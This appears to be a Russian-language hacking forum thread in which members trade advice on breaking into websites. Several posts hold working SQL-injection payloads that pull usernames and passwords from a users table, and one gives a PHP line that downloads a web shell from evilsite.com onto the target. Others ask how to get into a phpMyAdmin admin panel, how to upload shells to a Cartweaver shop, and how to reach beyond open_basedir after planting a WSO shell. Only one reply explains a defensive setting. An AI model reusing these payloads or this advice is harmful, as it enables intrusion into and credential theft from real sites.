Ваши вопросы по уязвимостям.

DELITE

 

to абвгдешка

Code:

-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+limit+0,1), FLOOR(RAND(0)*2), 64))

 

to bodrich
У Вас не получается, потому как может стоять FreeBSD там нет wget'a там fetch стоит по умолчанию,a лучше делать через file_put_contents("shell.php",file_get_contents("http://evilsite.com/shell.txt"))

Может уже есть там такой файл? И лейте в папку со смайлами!

 

Ребята что можно сделать с такой проблемой - Есть данные бд от сайта но подключиться можно только по localhost , как быть с удаленным подключением ?

 

Никак!

 

Товарищи!
Тема: phpmyadmin
имеется доступ к /scripts/setup.php
точнее: версия 2.11.2.2
сплоиты не пашут.
Можно ли что-то сотворить чтобы войти в админку?
спасибо.
PS: на кнопки хоть тыкай, хоть нет: config.inc.php пуст,как добавить нового юзера понятия не имею

 

Добрый вечер, парни. Вопрос такого характера. На днях столкнулся с, казалось бы идеальным вариантом заливки через GET-запрос в адресной строке браузера: file_priv == Y, MQ == off, раскрытие путей, все дела.

Быстро просканив директории сайта, на предмет каталогов, куда бы залить бекдор, меня везде ждал облом. Я списал это на отсутствие прав на запись.

Однако, поскольку сайт бы русскоязычный, я предположил, что там возможно присутствие папки Sape, которая всегда 0777. Так, вот имея все вводные данные, описанные выше, я не смог прочитать через load_file исходный код страницы index.php. Вообще никаких. /etc/passwd, мускульные конфиги - да, но только не файлы из каталогов самого сайта.

Я где-то читал, что мускул имеет возможную настройку, на запрет чтения файлов из каталога сайта, что именно и было в моем случае, как я понял. Был бы признателен за ссылки по этому вопросу - как настраивается подобная фича, где почитать?

Ведь это можно считать довольно неплохим рубежом защиты и для своего проекта.

Спасибо за любую помощь(в гугле не забанен, но что-то ничего не нашел, релевантное моему вопросу.)

 

Га-Ноцри

если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место

chmod 750, допустим

по поводу мускулного запрета (secure_file_priv) , читай тут

 

Большое спасибо за пояснение. Вопрос исчерпан. Углубился в чтение

 

Зачем вот так усложнять запрос?
Лишнее палево в логах.

Code:

 1' or 1 group by concat(version(),rand(0)|) having min(0)

Having min(0) не всегда нужен.

 

У Вас ошибка молодой человек, решили "поумничать", так писали бы правильно!

Code:

 1' or 1 group by concat(version(),rand(0)|[b]0[/b]) having min(0)

 

Опечатка настолько действительна?
Я думаю кому это реально интересно, сможет заметить.
И откуда тебе знать, может это скрипт киддинг?

 

ребят,а заливал кто шелл в cms-ку Cartweaver
поимел админку,а залиться не выходит...нашел блайнд-скулю,но через неё тоже не вышло...тем более mysql <5
если есть умельцы,отзовитесь,пожалуйста...очень важно

 

Узнать кто хостер, и взять тест на пару дней, многие хостеры предоставляют такую услугу. Ну а дальше дело техники...

 

/**/

 

В дополнение, могу упомянуть возможность использования php технологий gid-uid - те верификации пользователя:группы при запуске скрипта. Как-то: suexec, apache-mpm etc. В таком случае, скорее всего, даже если директория будет 0777 - nто если uid MYSQL(user) отличается от владельца(создателя) файла(директории) в корне сайта - то не прочтешь и не зальешь. В таком случае надо искать директории на которые выставлены специфические права позволяющие это делать.

 

Подскажите пожалуйста, залил шел wso2 на форум (forum.site.ru), возможно ли как то получить доступ к файлам site.ru? простой переход на директорию ниже не выходит

Safe mode: OFF
Open base dir: var/www/u1111/www/forum.site.ru

 

На одном хостинге, выше подняться не позволяют права, мне даже не то что бы доступ к файлам нужен был, а получить список файлов (ардрес админки найти)